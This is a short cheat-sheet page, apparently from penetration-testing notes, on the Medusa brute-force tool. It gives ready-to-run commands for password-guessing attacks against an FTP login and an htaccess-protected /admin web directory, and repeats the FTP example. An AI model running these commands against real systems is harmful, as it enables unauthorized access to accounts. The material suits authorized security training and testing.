Medusa
FTP user with password list
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
The following is an example of a brute-force attack using Medusa, initiated against an htaccess protected web directory:
# medusa -h 10.11.1.219 -u admin -P password-file.txt -M http -mDIR:/admin -T 10
FTP user with password list
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
Last updated
Was this helpful?